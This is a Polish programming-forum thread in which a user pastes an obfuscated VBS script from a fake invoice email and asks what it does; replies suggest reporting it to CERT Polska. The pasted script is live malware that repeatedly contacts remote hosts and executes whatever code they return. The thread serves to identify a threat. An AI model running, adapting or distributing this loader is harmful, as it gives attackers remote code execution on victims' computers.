• Najnowsze pytania
  • Bez odpowiedzi
  • Zadaj pytanie
  • Kategorie
  • Tagi
  • Zdobyte punkty
  • Ekipa ninja
  • IRC
  • FAQ
  • Regulamin
  • Książki warte uwagi
Zapytaj

Skrypt w VBS - co on robi?

Object Storage Arubacloud
0 głosów
927 wizyt
pytanie zadane 21 września 2018 w Visual Basic przez Jiin Obywatel (1,390 p.)
zmienione kategorie 21 września 2018 przez Eryk Andrzejewski

Witam serdecznie

Dostałem ostatnio na maila 'fakturę' od zapewne jakiegoś Pana, który wykorzystując nazwę jakiejś firmy próbuje zawirusować komputer w innych firmach. Załącza do maila plik VBS spakowany w .rar. No i jestem ciekaw co ten plik robi. Skrypt:

dim sss, DuriOAdaMyArray, MadriOdaKadurls, TaniPoldsAhttpsd, PerepravaAdzz, CSKAfkkk, PiroGinaAdands
dim DreMosAdQQSurls, LudoViKaate, PiPloVirasdate
PiPloVirasdate = null
PerepravaAdzz = "773335550757"

Function  PilOsaAdQQFSkip()
  On Error Resume Next
	KipoloasAdMinsa()
    POOOPPAQMessage(PiPloVirasdate)
	CSKAfkkk = Array("", "", "")
End Function

Function  TexasSFAxdA()
    On Error Resume Next
   Set TaniPoldsAhttpsd = CreateObject("Microsoft.XMLHTTP")
	TaniPoldsAhttpsd.Open "GET", "https://www.goooglwas.freesaf/111/222", False
    TaniPoldsAhttpsd.Send	

    If (TaniPoldsAhttpsd.Status = 200) Then    
		TradionsiksMase()
    Else      
		PinachetoSHello() 
		
		
	End If

	
End Function

Function  TradionsiksMase()
	dim dododsex
	dododsex = 0
    dododsex = FormatDateTime(Now, vbLongTime) 
	TradionsiksMase(dododsex)
End Function

Function  PoloDoadsloas()
  On Error Resume Next
    randomize
    PiroGinaAdands = int(rnd*2) + 1
	DreMosAdQQSurls = "http://"+CSKAfkkk(PiroGinaAdands)+"/ip.php?number=753246&opt=" 
    PoloDoadsloas(DreMosAdQQSurls)
End Function


Function  PoloDoadsloas2()
	Dim Farujuylsd
 Farujuylsd = PoloDoadsloas()
End Function

Function  PoloDoadsloas3()
	PoloDoadsloas2()
End Function

Function  PoloDoadsloas4()
	PoloDoadsloas3()
End Function

Function  KipoloasAdMinsa()
	CSKAfkkk(2) = "192.3.204.232"
	CSKAfkkk(1) = "servesmailerprogres.science"
	PoloDoadsloas4()
End Function

Function PilotyUsaTest()
     	 TerpiloaAReset()
End Function

Function  TerpiloaAReset()
    PerepravaAdzz = CStr(PerepravaAdzz + 1) 
End Function

Function  GreeceFaxPc()
  On Error Resume Next
   While true
       WScript.Sleep 7000
    Call PilOsaAdQQFSkip()
   Wend
End Function

Function  DomOsaAGoo(responseText)
    On Error Resume Next
	DuriOAdaMyArray = Array(22, 11, 00, 22,43, 34, 2341, responseText)
	TexasSFAxdA()
End Function

Function  POOOPPAQMessage(lolosaddate)
    On Error Resume Next 
    dim wertyUsdreq, streddy
    Set wertyUsdreq = createobject("Microsoft.XMLHTTP")
    wertyUsdreq.Open "GET", lolosaddate, False
    wertyUsdreq.Send
            WScript.Sleep 100	
			streddy = wertyUsdreq.responseText
	DomOsaAGoo(streddy)
End Function

Function LiveAdTest()
        PiPloVirasdate = ""
	PiPloVirasdate =+ DreMosAdQQSurls  + PerepravaAdzz + "&" +  "yousa"		
End Function

Function GameSSTest()
    PilotyUsaTest()      
	LiveAdTest()
End Function

Function PinachetoSHello()
	GameSSTest()
         Execute "" + DuriOAdaMyArray(7) + "" 
End Function



Call GreeceFaxPc()

 

2 odpowiedzi

+2 głosów
odpowiedź 21 września 2018 przez bimbrownik Mądrala (5,180 p.)

Możesz zgłosić to do analizy CERT Polska jako incydent zagrożenia bezpieczeństwa. Link

–2 głosów
odpowiedź 21 września 2018 przez profesorek96 Szeryf (91,420 p.)
Ciekawe ciekawe. Chyba nauczę się podstaw VBS bo to jest ciekawy temat.

Podobne pytania

0 głosów
1 odpowiedź 842 wizyt
Blokowanie skryptów .VBS - wirus w mailu
pytanie zadane 19 listopada 2018 w Bezpieczeństwo, hacking przez Michał Samolewski Bywalec (2,240 p.)
0 głosów
0 odpowiedzi 124 wizyt
[vbs] komunikacja z modemem
pytanie zadane 28 listopada 2016 w Visual Basic przez rafi-vir Nowicjusz (140 p.)
0 głosów
0 odpowiedzi 193 wizyt
VBS - program gubi strony
pytanie zadane 25 marca 2016 w Visual Basic przez Gazunek Nowicjusz (160 p.)

92,576 zapytań

141,426 odpowiedzi

319,652 komentarzy

61,961 pasjonatów

Kategorie pytań
Programowanie
Sprzęt komputerowy
Systemy operacyjne, programy
Sieci komputerowe
Hostingi, domeny, usługi
Urządzenia mobilne
Bezpieczeństwo, hacking
Rozwój zawodowy, nauka, praca
Egzaminy zawodowe
Matematyka, fizyka, logika
Grafika i multimedia
Ogłoszenia, zlecenia
Nasze projekty
Nasze poradniki
Sprawy forum
Offtop
Programowanie
C i C++ HTML i CSS JavaScript PHP SQL, bazy danych C# Java SPOJ Python Ruby Assembler Visual Basic Android, Swift, Symbian OpenGL, Unity Inne języki Algorytmy Systemy CMS Mikrokontrolery

Motyw:

Akcja Pajacyk

Pajacyk od wielu lat dożywia dzieci. Pomóż klikając w zielony brzuszek na stronie. Dziękujemy! ♡

Oto polecana książka warta uwagi.
Pełną listę książek znajdziesz tutaj.

Akademia Sekuraka

Kolejna edycja największej imprezy hakerskiej w Polsce, czyli Mega Sekurak Hacking Party odbędzie się już 20 maja 2024r. Z tej okazji mamy dla Was kod: pasjamshp - jeżeli wpiszecie go w koszyku, to wówczas otrzymacie 40% zniżki na bilet w wersji standard!

Więcej informacji na temat imprezy znajdziecie tutaj. Dziękujemy ekipie Sekuraka za taką fajną zniżkę dla wszystkich Pasjonatów!

Akademia Sekuraka

Niedawno wystartował dodruk tej świetnej, rozchwytywanej książki (około 940 stron). Mamy dla Was kod: pasja (wpiszcie go w koszyku), dzięki któremu otrzymujemy 10% zniżki - dziękujemy zaprzyjaźnionej ekipie Sekuraka za taki bonus dla Pasjonatów! Książka to pierwszy tom z serii o ITsec, który łagodnie wprowadzi w świat bezpieczeństwa IT każdą osobę - warto, polecamy!

O działaniu forum

Pasja informatyki w internecie

Polecane miejsca w sieci

Snow Theme by Q2A Market
Powered by Question2Answer
...